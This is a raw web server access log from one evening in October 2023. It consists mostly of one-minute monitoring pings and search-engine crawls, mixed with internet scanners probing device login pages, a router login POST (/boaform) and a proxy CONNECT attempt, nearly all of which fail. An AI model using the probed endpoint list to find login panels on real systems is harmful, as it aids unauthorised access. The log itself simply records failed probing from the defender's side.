212.91.246.72 - - [04/Oct/2023:20:35:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:39:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:40:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:42:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:45:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:46:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:47:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.189 - - [04/Oct/2023:20:47:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:20:48:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:49:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:50:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:52:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.8.118 - - [04/Oct/2023:20:53:03 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Oct/2023:20:53:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.8.118 - - [04/Oct/2023:20:54:01 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Oct/2023:20:54:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:55:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:56:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.204 - - [04/Oct/2023:20:57:29 +0200] "GET /robots.txt HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.18 - - [04/Oct/2023:20:57:29 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.205 - - [04/Oct/2023:20:57:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.20 - - [04/Oct/2023:20:57:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [04/Oct/2023:20:57:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:58:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:20:59:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.35 - - [04/Oct/2023:21:00:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.35 - - [04/Oct/2023:21:00:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:00:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.140.6 - - [04/Oct/2023:21:00:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:21:01:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:02:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:03:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
81.16.242.90 - - [04/Oct/2023:21:06:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:21:06:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:07:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.219.94.144 - - [04/Oct/2023:21:08:31 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:21:08:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:09:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:10:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:11:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.232.155.76 - - [04/Oct/2023:21:11:49 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Oct/2023:21:12:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.213 - - [04/Oct/2023:21:13:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.213 - - [04/Oct/2023:21:13:30 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.213 - - [04/Oct/2023:21:13:30 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Oct/2023:21:13:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:14:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:15:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:16:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:17:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.169.55 - - [04/Oct/2023:21:17:53 +0200] "" 501 315 "-" "-"
3.10.169.55 - - [04/Oct/2023:21:18:37 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:18:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:19:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:20:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:21:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:22:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:23:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:24:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:25:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:25:59 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:26:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:26:44 +0200] "" 501 315 "-" "-"
182.253.246.38 - - [04/Oct/2023:21:26:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:21:27:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:28:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:29:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:30:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.90.161.105 - - [04/Oct/2023:21:30:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.90.161.105 - - [04/Oct/2023:21:30:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
18.169.184.14 - - [04/Oct/2023:21:31:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:31:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:32:14 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:21:32:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:32:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:33:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:34:01 +0200] "GET /api/v1/charts HTTP/1.1" 404 318 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.132.41.82 - - [04/Oct/2023:21:34:13 +0200] "" 501 315 "-" "-"
13.40.84.7 - - [04/Oct/2023:21:34:24 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:34:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.40.84.7 - - [04/Oct/2023:21:34:58 +0200] "" 501 315 "-" "-"
18.169.184.14 - - [04/Oct/2023:21:35:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:35:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:36:43 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:21:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.31 - - [04/Oct/2023:21:38:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
18.169.184.14 - - [04/Oct/2023:21:38:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:39:18 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
185.180.140.4 - - [04/Oct/2023:21:39:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [04/Oct/2023:21:39:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:40:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:40:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:42:06 +0200] "GET /doc/page/login.asp HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:21:42:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:43:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:44:57 +0200] "GET /users/sign_in HTTP/1.1" 404 318 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:21:45:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:46:43 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:46:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:47:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:47:48 +0200] "GET /webconsole/webpages/login.jsp HTTP/1.1" 404 334 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
66.249.66.204 - - [04/Oct/2023:21:48:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [04/Oct/2023:21:48:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:49:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:49:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:50:35 +0200] "GET /login/?next=/ HTTP/1.1" 404 311 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:21:50:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:51:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:52:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.248.133.123 - - [04/Oct/2023:21:52:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.123 - - [04/Oct/2023:21:52:30 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.123 - - [04/Oct/2023:21:52:30 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Oct/2023:21:52:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:53:14 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.10.152.77 - - [04/Oct/2023:21:53:34 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:53:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.10.152.77 - - [04/Oct/2023:21:54:15 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:54:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:54:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:55:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:55:58 +0200] "GET /global-protect/login.esp HTTP/1.1" 404 329 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:21:56:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:57:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:21:57:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:21:58:41 +0200] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:21:58:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:21:59:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
100.1.53.24 - - [04/Oct/2023:22:00:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
18.169.184.14 - - [04/Oct/2023:22:00:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:00:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:01:27 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:01:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:22:02:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:03:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
38.110.46.2 - - [04/Oct/2023:22:03:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux i686; rv:110.0) Gecko/20100101 Firefox/110.0"
212.91.246.72 - - [04/Oct/2023:22:03:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:04:17 +0200] "GET /login.rsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
199.45.154.4 - - [04/Oct/2023:22:05:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux i686; rv:110.0) Gecko/20100101 Firefox/110.0"
212.91.246.72 - - [04/Oct/2023:22:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:05:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:06:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:07:00 +0200] "GET /Login.html HTTP/1.1" 404 315 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:07:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:22:08:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:08:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
193.35.18.187 - - [04/Oct/2023:22:08:55 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [04/Oct/2023:22:09:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:09:49 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:10:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:11:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Oct/2023:22:11:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
171.67.71.144 - - [04/Oct/2023:22:12:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux i686; rv:110.0) Gecko/20100101 Firefox/110.0"
18.169.184.14 - - [04/Oct/2023:22:12:39 +0200] "GET /npclient.html HTTP/1.1" 404 318 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Oct/2023:22:12:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Oct/2023:22:13:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.169.184.14 - - [04/Oct/2023:22:14:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
